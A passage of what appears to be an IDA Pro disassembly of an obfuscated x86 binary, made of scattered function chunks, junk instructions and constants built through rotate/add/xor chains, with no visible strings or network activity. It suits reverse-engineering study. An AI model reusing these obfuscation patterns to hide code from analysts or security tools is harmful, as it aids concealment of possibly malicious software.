					; hvvrg7ie:0045B0F5j
		xchg	esi, [esp+0]
		pop	esi
		xor	eax, eax
sub_44E4A0	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44E4A6	proc near		; CODE XREF: sub_44AA1C+FAA8j

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043A7B0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043BBBC SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0043C26C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043CCD6 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043E59A SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004472FC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449022 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044D382 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452953 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0045462E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458162 SIZE 00000011 BYTES

		push	ebx
		jmp	loc_43A7B0
sub_44E4A6	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_44E4AC:				; CODE XREF: sub_43E128+1B5E0j
		jnz	loc_459E17
		jmp	loc_44921E
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------
		sbb	esi, edx
		jmp	sub_440312
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454D23

loc_44E4BE:				; CODE XREF: sub_454D23:loc_459879j
		jz	loc_44AD6B
		jmp	loc_45B06A
; END OF FUNCTION CHUNK	FOR sub_454D23
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453BA4

loc_44E4C9:				; CODE XREF: hvvrg7ie:loc_44FE91j
					; sub_453BA4:loc_451AF3j
		add	ecx, 0FE42D977h
		xchg	ecx, [esp+0Ch+var_C]
		jmp	loc_447A7D
; END OF FUNCTION CHUNK	FOR sub_453BA4
; ---------------------------------------------------------------------------
		or	eax, eax
		jnz	loc_452AFB
		jmp	loc_43DB90
; ---------------------------------------------------------------------------

loc_44E4E4:				; CODE XREF: hvvrg7ie:00456247j
		and	ebp, ecx
		sub	ebx, 1ADE39F7h
		jmp	loc_45705C
; ---------------------------------------------------------------------------

loc_44E4F1:				; DATA XREF: hvvrg7ie:0044867Eo
		call	sub_44059F
		mov	ds:off_41D01C, eax
		lea	eax, loc_43D208
		call	sub_450F01
; START	OF FUNCTION CHUNK FOR sub_452F78

loc_44E507:				; CODE XREF: sub_452F78-10D6Bj
		jmp	nullsub_163
; END OF FUNCTION CHUNK	FOR sub_452F78
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_403. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446F26

loc_44E50D:				; CODE XREF: sub_446F26:loc_44208Dj
		sub	edx, 5696F65Fh
		sbb	edx, ebx
		or	edx, edi
		jmp	near ptr dword_43F118+8
; END OF FUNCTION CHUNK	FOR sub_446F26
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4413FF

loc_44E51C:				; CODE XREF: sub_4413FF:loc_439BE4j
		rol	ecx, 8
		sub	ecx, 19EF8AF6h
		add	ecx, 65EBDF0Dh
		xchg	ecx, [esp+8+var_8]
		jmp	loc_439AF9
; END OF FUNCTION CHUNK	FOR sub_4413FF

; =============== S U B	R O U T	I N E =======================================



sub_44E533	proc near		; CODE XREF: sub_44398A+B2E5p
					; hvvrg7ie:00450B6Ej

arg_0		= dword	ptr  4
arg_8		= dword	ptr  0Ch

; FUNCTION CHUNK AT 00439592 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00439BF4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043A0B9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DCB6 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00440E6C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441714 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00442291 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00443E01 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00444DCD SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004486FC SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00449628 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00449D11 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044A5A5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BD9D SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044DAA4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454D17 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00455CFA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00456710 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045846A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045916C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459918 SIZE 0000001A BYTES

		xchg	ecx, [esp-4+arg_0]
		pop	ecx
		add	eax, 680C06F4h
		add	eax, ebp
		jmp	loc_44DAA4
sub_44E533	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44E544	proc near		; DATA XREF: sub_453422:loc_44929Co
		or	[ecx+edx], al
		push	67A6D5FDh
		pop	eax
sub_44E544	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_44E54D:				; CODE XREF: sub_446D8D:loc_442F38j
		rol	eax, 0Fh
		or	eax, 62373AE1h
		rol	eax, 0Ch
		jmp	loc_45B131
; END OF FUNCTION CHUNK	FOR sub_446D8D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C05

loc_44E55E:				; CODE XREF: sub_440C05:loc_43DCFEj
		pop	ebx
		retn
; END OF FUNCTION CHUNK	FOR sub_440C05

; =============== S U B	R O U T	I N E =======================================



sub_44E560	proc near		; CODE XREF: sub_442BA8+647j
					; sub_45A003-157A2p ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00444D62 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00445220 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 0044A129 SIZE 00000015 BYTES

		jz	sub_44B135
		push	edx
		mov	edx, ebp
		xchg	edx, [esp+4+var_4]

loc_44E56C:				; CODE XREF: hvvrg7ie:loc_441C7Cj
		mov	ebp, esp
		push	ecx
		jmp	loc_44A129
sub_44E560	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44E574:				; CODE XREF: hvvrg7ie:0043EE8Fj
		push	0DAAAF4B5h
		pop	eax
		rol	eax, 6
		add	eax, 2CF15B82h
		sub	eax, 3F80D217h
		add	eax, 6817FF65h
		xchg	eax, [esp]
		jmp	loc_454319
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4544DD

loc_44E597:				; CODE XREF: sub_4544DD-1595Cj
		ja	nullsub_189
		or	ebp, 8FE43E05h

loc_44E5A3:				; CODE XREF: sub_4544DD:loc_4510E1j
		mov	eax, 10h
		push	ecx
		mov	ecx, eax
		xchg	ecx, [esp+0Ch+var_C]
		push	0D12A5396h
		pop	eax
		jmp	loc_448B94
; END OF FUNCTION CHUNK	FOR sub_4544DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440881

loc_44E5B9:				; CODE XREF: sub_440881:loc_45158Ej
		jnz	loc_4486DB
		jmp	loc_4450EF
; END OF FUNCTION CHUNK	FOR sub_440881
; ---------------------------------------------------------------------------
		dd 3E3C8A0Fh
		db 2 dup(0FFh)

; =============== S U B	R O U T	I N E =======================================



sub_44E5CA	proc near		; CODE XREF: hvvrg7ie:00442F01p
		xchg	edx, [esp+0]
		pop	edx
		xor	eax, 0E9F8A129h
		rol	eax, 18h
		push	edi
		jmp	loc_4422BB
sub_44E5CA	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4585BB

loc_44E5DD:				; CODE XREF: sub_4585BB-197A4j
		pop	ebx
		pop	ecx
		pop	eax
		call	sub_44F4FA
; END OF FUNCTION CHUNK	FOR sub_4585BB
; START	OF FUNCTION CHUNK FOR sub_450434

loc_44E5E5:				; CODE XREF: sub_450434-CF2j
		jmp	loc_44A6E5
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4393BC

loc_44E5EA:				; CODE XREF: sub_4393BC+Dj
		jmp	sub_44DE0A
; END OF FUNCTION CHUNK	FOR sub_4393BC
; ---------------------------------------------------------------------------

loc_44E5EF:				; CODE XREF: hvvrg7ie:00451F91j
		jbe	loc_445F92

; =============== S U B	R O U T	I N E =======================================



sub_44E5F5	proc near		; CODE XREF: hvvrg7ie:00453BE2p
		xchg	edx, [esp+0]
		pop	edx
		push	4A80E752h
		sbb	ebx, 33186A06h
		jmp	loc_4489E4
sub_44E5F5	endp


; =============== S U B	R O U T	I N E =======================================



sub_44E609	proc near		; CODE XREF: hvvrg7ie:00449D9Ej
					; sub_43E128:loc_456BC6p ...

arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 00449042 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		add	esi, 0D04481E1h
		popf
		xchg	esi, [esp-8+arg_4]

loc_44E617:				; CODE XREF: sub_448100+4ED7j
		jmp	loc_449042
sub_44E609	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A2D1

loc_44E61C:				; CODE XREF: sub_44A2D1:loc_456B80j
		add	esi, 0FFFDDFE0h
		xchg	esi, [esp+8+var_8]
		push	eax
		pushf
		push	6B0AC256h

loc_44E62C:				; CODE XREF: hvvrg7ie:loc_44538Aj
		pop	eax
		jmp	loc_43921F
; END OF FUNCTION CHUNK	FOR sub_44A2D1
; ---------------------------------------------------------------------------

loc_44E632:				; CODE XREF: hvvrg7ie:00455A9Bj
		jnp	loc_451EF1
; START	OF FUNCTION CHUNK FOR sub_43FB25

loc_44E638:				; CODE XREF: sub_43FB25+14768j
		rol	esi, 1
		add	esi, 38E6466Bh
		popf
		xchg	esi, [esp-8+arg_4]
		jmp	sub_446A16
; END OF FUNCTION CHUNK	FOR sub_43FB25
; ---------------------------------------------------------------------------

loc_44E649:				; CODE XREF: hvvrg7ie:0044210Aj
		jl	loc_43BB92
		jo	loc_44BD52
; START	OF FUNCTION CHUNK FOR sub_4533F2

loc_44E655:				; CODE XREF: sub_4533F2:loc_4420F4j
		add	edi, 3FFD002Ah
		xchg	edi, [esp+4+var_4]
		jmp	loc_440C00
; END OF FUNCTION CHUNK	FOR sub_4533F2
; ---------------------------------------------------------------------------
		push	offset loc_44ECA4
		jmp	loc_444B6B
; ---------------------------------------------------------------------------

loc_44E66D:				; CODE XREF: hvvrg7ie:0045B8A5j
		mov	ebp, edx
		mov	esi, 8B8413F7h
		jmp	loc_44B620
; ---------------------------------------------------------------------------
		test	al, al
		jz	loc_4559EC
		jmp	loc_44EC79
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457F6F

loc_44E686:				; CODE XREF: sub_457F6F:loc_43B1E5j
		not	edi
		jmp	loc_45529F
; END OF FUNCTION CHUNK	FOR sub_457F6F

; =============== S U B	R O U T	I N E =======================================



sub_44E68D	proc near		; CODE XREF: hvvrg7ie:0043EB67j
					; sub_45438B+13p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

; FUNCTION CHUNK AT 0044A945 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BFA9 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00451820 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00454173 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004585F4 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00459767 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045A0CF SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		add	edi, 0A90D3F1Ch
		xchg	edi, [esp+0]
		jmp	loc_45A0CF
sub_44E68D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44E69F:				; CODE XREF: hvvrg7ie:004511C5j
		adc	eax, 2E8310Bh

; =============== S U B	R O U T	I N E =======================================



sub_44E6A5	proc near		; CODE XREF: sub_43D4D2-1C4Bp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043FF93 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044237B SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00446461 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C427 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044D9BD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045145E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00454437 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00456728 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00457258 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004580A6 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00458D90 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459F17 SIZE 00000011 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	0CB1BB32h
		pop	ebx
		jmp	loc_459F17
sub_44E6A5	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44E6B4	proc near		; CODE XREF: hvvrg7ie:0043B0AFj
					; sub_450434:loc_453C5Ep

; FUNCTION CHUNK AT 0044A9F9 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00458C08 SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	edi
		push	4556EBEDh
		pop	edi
		sub	edi, ds:4000F1h
		or	edi, 419B2EAEh
		jmp	loc_44A9F9
sub_44E6B4	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44616F

loc_44E6D0:				; CODE XREF: sub_44616F-8301j
		xchg	ecx, [esp+4+var_4]
		jmp	loc_44DBD1
; END OF FUNCTION CHUNK	FOR sub_44616F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451669

loc_44E6D8:				; CODE XREF: sub_451669-956Ej
		pop	eax
		add	eax, 0F703CA51h
		xor	eax, 90A3291h
		add	eax, 2FF2D824h
		call	sub_450C5A
		push	ecx
		jmp	loc_455387
; END OF FUNCTION CHUNK	FOR sub_451669
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44980B

loc_44E6F6:				; CODE XREF: sub_44980B+3B12j
		jb	loc_440466
		popf
		or	edx, eax

loc_44E6FF:				; CODE XREF: sub_44980B:loc_43C6E8j
		mov	eax, [ebp-4]
		call	nullsub_454
		retn
; END OF FUNCTION CHUNK	FOR sub_44980B
; ---------------------------------------------------------------------------

loc_44E708:				; CODE XREF: hvvrg7ie:0044A66Ej
		jmp	loc_44366E
; ---------------------------------------------------------------------------

loc_44E70D:				; CODE XREF: hvvrg7ie:00445573j
		jmp	sub_450C5A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_454. PRESS KEYPAD	"+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_504. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452F0E

loc_44E714:				; CODE XREF: sub_452F0E+5DC9j
		jmp	loc_456493
; END OF FUNCTION CHUNK	FOR sub_452F0E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A654

loc_44E719:				; CODE XREF: sub_44A654+7j
		jmp	sub_45A310
; END OF FUNCTION CHUNK	FOR sub_44A654
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456E27

loc_44E71E:				; CODE XREF: sub_456E27+14j
		jz	loc_45B0B8
		jmp	loc_43FA5E
; END OF FUNCTION CHUNK	FOR sub_456E27
; ---------------------------------------------------------------------------

loc_44E729:				; CODE XREF: hvvrg7ie:004422DFj
		jbe	loc_43E081

; =============== S U B	R O U T	I N E =======================================



sub_44E72F	proc near		; CODE XREF: sub_445BE8+3296p

; FUNCTION CHUNK AT 0043A853 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043DAA3 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043E71C SIZE 00000025 BYTES
; FUNCTION CHUNK AT 004478A4 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004576CA SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00458A95 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		mov	[ebp-28h], eax
		mov	dword ptr [ebp-14h], 4
		mov	eax, [ebp-14h]
		jmp	loc_43A853
sub_44E72F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_44E745:				; CODE XREF: sub_446D8D-5FA9j
					; sub_450D8D-A265j
		jnz	loc_4454F2
		push	offset loc_4575A2
		jmp	loc_444572
; END OF FUNCTION CHUNK	FOR sub_446D8D
; ---------------------------------------------------------------------------

loc_44E755:				; CODE XREF: hvvrg7ie:loc_44645Cj
		jz	loc_44DD32
		jmp	loc_43EF2F
; ---------------------------------------------------------------------------

loc_44E760:				; DATA XREF: sub_448663+A205o
		add	ecx, 11642188h
		push	offset sub_453D30

loc_44E76B:				; CODE XREF: hvvrg7ie:0043C8D5j
		jmp	loc_44720F
; ---------------------------------------------------------------------------

loc_44E770:				; DATA XREF: sub_44C8C7-9405o
		adc	ebx, ecx
		mov	ecx, 8682014h
		push	eax
		push	0B374A248h
		pop	eax
		rol	eax, 0Fh
		sub	eax, 0A3E346D3h
		jmp	loc_455937
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4569C6

loc_44E78C:				; CODE XREF: sub_4569C6+41D2j
		jnz	loc_43A0FE
		jmp	loc_4426BA
; END OF FUNCTION CHUNK	FOR sub_4569C6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FC15

loc_44E797:				; CODE XREF: sub_43FC15:loc_451BC3j
		sub	ecx, edi
		jmp	loc_459DEA
; ---------------------------------------------------------------------------

loc_44E79E:				; CODE XREF: sub_43FC15+21BDj
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		jmp	loc_44D437
; END OF FUNCTION CHUNK	FOR sub_43FC15
; ---------------------------------------------------------------------------
		sub	esi, 681F114Ch
		jmp	loc_459933
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A230

loc_44E7B5:				; CODE XREF: sub_44A230:loc_44EDBEj
		jge	loc_459FE0
; END OF FUNCTION CHUNK	FOR sub_44A230
; START	OF FUNCTION CHUNK FOR sub_44B3E5

loc_44E7BB:				; CODE XREF: sub_44B3E5+7j
		jmp	nullsub_507
; END OF FUNCTION CHUNK	FOR sub_44B3E5
; ---------------------------------------------------------------------------
		popf
		jge	loc_43A321
		xchg	edi, [esi]
		jmp	loc_459FE0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4468C2

loc_44E7CE:				; CODE XREF: sub_4468C2+177Dj
		ja	loc_45919A
		rol	edx, 1Fh
		adc	ebx, ecx

loc_44E7D9:				; CODE XREF: sub_4468C2:loc_454182j
		or	ecx, 7E1AEDB8h
		jmp	loc_45674C
; END OF FUNCTION CHUNK	FOR sub_4468C2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450246

loc_44E7E4:				; CODE XREF: sub_450246:loc_4518A9j
		add	ebx, 0D58DAC22h
		mov	ebx, [ebx]
		popf

loc_44E7ED:				; CODE XREF: sub_4557D4:loc_43CFECj
		cmp	eax, ebx
		xchg	ecx, [esp+0]
		mov	ebx, ecx
		pop	ecx
		jnb	loc_441488
		jmp	loc_447B55
; END OF FUNCTION CHUNK	FOR sub_450246
; ---------------------------------------------------------------------------
		mov	edx, 3CC6743Ch
		call	sub_446A16
		push	eax
		ror	eax, 16h
		mov	ds:dword_439CC0, eax
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442B3C

loc_44E815:				; CODE XREF: sub_442B3C-17A2j
		rol	eax, 16h
		push	eax
		jmp	nullsub_109
; END OF FUNCTION CHUNK	FOR sub_442B3C
; ---------------------------------------------------------------------------
		and	edi, esi
		jmp	loc_439A66
; ---------------------------------------------------------------------------

loc_44E825:				; DATA XREF: sub_44C8AA+13o
		sub	ecx, eax
		xor	eax, eax
		call	sub_444363

loc_44E82E:				; CODE XREF: hvvrg7ie:00456362j
		jmp	locret_44DAA2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E1C

loc_44E833:				; CODE XREF: sub_451E1C+9j
		jmp	loc_455864
; END OF FUNCTION CHUNK	FOR sub_451E1C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448100

loc_44E838:				; CODE XREF: sub_448100:loc_44FD16j
		pop	ebx

loc_44E839:				; CODE XREF: hvvrg7ie:0043B204j
					; sub_452D54+Bj ...
		pushf
		push	27F534BEh
		pop	eax
		add	eax, 0DB7FB7EEh
		xor	eax, 7D260309h
		add	eax, ebp
		jmp	loc_443043
; END OF FUNCTION CHUNK	FOR sub_448100
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_218. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44E854:				; CODE XREF: hvvrg7ie:loc_448888j
		push	0F6A507Eh
		pop	edx
		sub	edx, 0F0754839h
		or	edx, 79D3555Bh
		cmp	edx, 9D0E92E3h
		jmp	loc_43C97E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D98D

loc_44E871:				; CODE XREF: sub_44D98D+Dj
		call	sub_43B9C9

loc_44E876:				; CODE XREF: sub_4403D4-510j
		jmp	loc_44CE07
; END OF FUNCTION CHUNK	FOR sub_44D98D
; ---------------------------------------------------------------------------
		mov	eax, 0CE14EFFFh
		call	sub_440312
		mov	edx, [eax]
		jmp	sub_454F91
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443452

loc_44E88C:				; CODE XREF: sub_443452-9BEFj
		jnb	loc_43A448
		xor	ebx, esi
		jmp	loc_43A265
; END OF FUNCTION CHUNK	FOR sub_443452
; ---------------------------------------------------------------------------

loc_44E899:				; CODE XREF: hvvrg7ie:loc_45497Fj
		and	ecx, 3A6B5537h
		or	ecx, 687EE88Bh
		test	ecx, 8
		jmp	loc_44B6AB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C0DE

loc_44E8B0:				; CODE XREF: sub_43C0DE:loc_4451D0j
		or	ecx, 239FD4F8h
		add	ecx, 44A55CC4h
		call	sub_455CB0
; END OF FUNCTION CHUNK	FOR sub_43C0DE
; START	OF FUNCTION CHUNK FOR sub_453BA4

loc_44E8C1:				; CODE XREF: sub_453BA4+Cj
		jmp	loc_44FB7E
; END OF FUNCTION CHUNK	FOR sub_453BA4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4398FA

loc_44E8C6:				; CODE XREF: sub_4398FA:loc_44836Bj
					; sub_4398FA+EA86j
		and	ebx, ds:4000F7h
		add	ebx, 0EBC39CF9h
		xchg	ebx, [esp+4+var_4]
		jmp	sub_43C836
; END OF FUNCTION CHUNK	FOR sub_4398FA
; ---------------------------------------------------------------------------

loc_44E8DA:				; CODE XREF: hvvrg7ie:0044DF08j
		or	esi, 317D553Ch
		sub	esi, 7D791E02h
		or	esi, 0A109D60h
		add	esi, 522D3F7Ah
		add	eax, esi
		pop	esi
		jmp	loc_452ADB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448BC0

loc_44E8FA:				; CODE XREF: sub_448BC0+4j
		mov	eax, ds:dword_4495B0
		jmp	loc_44C73D
; END OF FUNCTION CHUNK	FOR sub_448BC0
; ---------------------------------------------------------------------------

loc_44E905:				; CODE XREF: hvvrg7ie:loc_43F9FEj
		sub	ecx, 216E3D88h
		rol	ecx, 0Ah
		add	ecx, 0A534A807h
		mov	[ecx], eax
		jmp	loc_441378
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4500FA

loc_44E91B:				; CODE XREF: sub_4500FA:loc_43D15Cj
		pop	eax
		sub	eax, 250735EDh
		and	eax, 3BEC6858h
		test	eax, 4
		jmp	loc_4483E9
; END OF FUNCTION CHUNK	FOR sub_4500FA
; ---------------------------------------------------------------------------
		push	edi
		mov	edi, ecx
		xchg	edi, [esp]
		push	62249DB1h
		pop	ecx
		and	ecx, 574A9DD8h
		jmp	loc_45326E
; ---------------------------------------------------------------------------

loc_44E94A:				; DATA XREF: hvvrg7ie:00440EA3o
		xchg	eax, [esp]
		call	sub_43AF30
; START	OF FUNCTION CHUNK FOR sub_451669

loc_44E952:				; CODE XREF: sub_451669+9407j
		jmp	loc_458310
; END OF FUNCTION CHUNK	FOR sub_451669
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E063

loc_44E957:				; CODE XREF: sub_43E063:loc_456688j
		jnz	loc_455FA7
		jmp	loc_44B7BC
; END OF FUNCTION CHUNK	FOR sub_43E063
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B69F

loc_44E962:				; CODE XREF: sub_44B69F:loc_4423C6j
		jl	loc_458413
		not	edi
		jmp	loc_458411
; END OF FUNCTION CHUNK	FOR sub_44B69F
; ---------------------------------------------------------------------------

loc_44E96F:				; CODE XREF: hvvrg7ie:0044C0BFj
		adc	edi, esi
; START	OF FUNCTION CHUNK FOR sub_459B45

loc_44E971:				; CODE XREF: sub_459B45:loc_44C0B1j
		add	esi, 885BAD8h
		xchg	esi, [esp+0]
		jmp	loc_44F386
; END OF FUNCTION CHUNK	FOR sub_459B45
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45889B

loc_44E97F:				; CODE XREF: sub_45889B-DCCBj
		jno	loc_4545E9
		cdq

loc_44E986:				; CODE XREF: hvvrg7ie:loc_459403j
		call	nullsub_13
		retn
; END OF FUNCTION CHUNK	FOR sub_45889B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C8C7

loc_44E98C:				; CODE XREF: sub_44C8C7+60BDj
		jmp	loc_4434B5
; END OF FUNCTION CHUNK	FOR sub_44C8C7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4589D3

loc_44E991:				; CODE XREF: sub_4589D3-1C4C2j
		jmp	loc_451B21
; END OF FUNCTION CHUNK	FOR sub_4589D3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_13. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451669

loc_44E997:				; CODE XREF: sub_451669:loc_4479D0j
		add	eax, edx
		pop	edx
		mov	edi, [eax]
		push	edi

loc_44E99D:				; CODE XREF: hvvrg7ie:00441B26j
		push	0FB62D166h
		jmp	loc_44943C
; END OF FUNCTION CHUNK	FOR sub_451669
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EB47

loc_44E9A7:				; CODE XREF: sub_43EB47+828Cj
		sbb	eax, ebx

loc_44E9A9:				; CODE XREF: sub_43EB47:loc_43EC0Aj
		push	0A7BD1A8Ah
		pop	eax
		or	eax, 1B0FD278h
		rol	eax, 1Eh
		or	eax, 0BE9367F1h
		xor	eax, 969F3D74h
		jmp	loc_4460EE
; END OF FUNCTION CHUNK	FOR sub_43EB47
; ---------------------------------------------------------------------------

loc_44E9C9:				; CODE XREF: hvvrg7ie:0044DA64j
		push	0BB06CE9Ch
		pop	eax
		rol	eax, 1Ah
		sub	eax, 0D1F3B035h
		call	sub_43EE1C
; START	OF FUNCTION CHUNK FOR sub_454789

loc_44E9DD:				; CODE XREF: sub_454789-17F3Aj
		jmp	loc_45AAA8
; END OF FUNCTION CHUNK	FOR sub_454789
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44955C

loc_44E9E2:				; CODE XREF: sub_44955C-E2DEj
		jmp	sub_456423
; END OF FUNCTION CHUNK	FOR sub_44955C

; =============== S U B	R O U T	I N E =======================================



sub_44E9E7	proc near		; DATA XREF: sub_44BFF5+1EEDo
		xchg	edx, [esp+0]
		jmp	sub_450C5A
sub_44E9E7	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_44E9EF:				; CODE XREF: sub_44D2F8-11571j
		test	ebp, edi
		jmp	loc_4431FF
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
		jg	loc_44F926
		xchg	ebp, esi
		jmp	sub_43EE33
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_84. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444B29

loc_44EA04:				; CODE XREF: sub_444B29-4C5j
		jmp	loc_44F532
; END OF FUNCTION CHUNK	FOR sub_444B29
; ---------------------------------------------------------------------------
		push	7CB8088Dh
		pop	eax
		xor	eax, 0A8AF6031h
		add	eax, 0AAD92D94h
		and	eax, 0EEB3B31h
		jmp	loc_451159
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445DC4

loc_44EA26:				; CODE XREF: sub_445DC4+10j
		pop	ebx
		xor	ebx, 479D2C3Fh
		add	ebx, 70D0E7CDh
		xchg	ebx, [esp+4+var_4]
		jmp	loc_454BEF
